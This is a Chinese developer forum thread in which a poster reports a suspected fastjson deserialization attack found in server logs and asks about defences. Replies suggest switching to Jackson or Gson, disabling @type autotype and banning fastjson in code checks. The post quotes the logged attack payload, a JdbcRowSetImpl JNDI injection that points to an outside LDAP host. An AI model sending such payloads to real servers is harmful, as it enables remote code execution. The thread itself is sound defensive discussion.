服务疑似被尝试 fastjson 漏洞攻击

2022-05-06 16:57:53 +08:00

moe3000

日志中查到有人发送异常参数至接口

{"x":{{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://9.4.131.68:1389/fastjsonfc5fd1bcac3b753a7d4fa9dab78d162e","autoCommit":true}}

查了下可能是 fastjson 反序列化攻击，目前项目使用的 fastjson 版本是 1.2.73 ，好像不在攻击范围内，请问下还有其他防御措施吗

3488 次点击

所在节点

Java

13 条回复

Jooooooooo

2022-05-06 16:59:28 +08:00

换 jackson

moe3000

2022-05-06 17:00:23 +08:00

@Jooooooooo 下个、下个版本一定

BBCCBB

2022-05-06 17:02:58 +08:00

不知道关掉这个按 @type 来反序列化的功能能不能防止这个问题? 就 http 请求的参数的反序列化用不到这个 @type 的功能.

bthulu

2022-05-06 17:06:39 +08:00

不在攻击范围内, 有空就升级到最新版, 没空就不管它. jackson 一样有这样的问题.

clf

2022-05-06 17:10:19 +08:00

公司的代码规范检查插件里。就直接代码检查 com.alibaba 的包。有用到的禁止提交代码。gitlab 的 hooks 也是加了检查。

RainCats

2022-05-06 17:40:06 +08:00

@clf 有点极端了吧，完全不用阿里系的东西

clf

2022-05-06 17:54:00 +08:00

@RainCats #6 也用的，但只用开源基金会支持的，阿里已经捐给 apache 的都是 apache 的包名。主要是不用 fastjson

ufan0

2022-05-06 21:46:01 +08:00

@clf #7 咱公司上海有开放招聘吗？想投！！！

fff333

2022-05-06 21:48:35 +08:00

@moe3000 gson

banmuyutian

2022-05-07 10:37:10 +08:00

@clf #5
我现在还用的阿里项目仅剩下 easyexcel

houzhishi

2022-05-07 13:38:00 +08:00

脚本小子在瞎跑，不用太在意，结合业务看是否可以关闭自省 @type

clf

2022-05-07 14:46:09 +08:00

@banmuyutian 我们是直接用的 POI ，和基础服务的数据结构（比如表单等）封装了接口。

xiaopigfly

2022-05-07 14:53:52 +08:00

问题不大，只要放到公网就会有人扫描。正常的。

第 1 页／共 1 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/851201

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.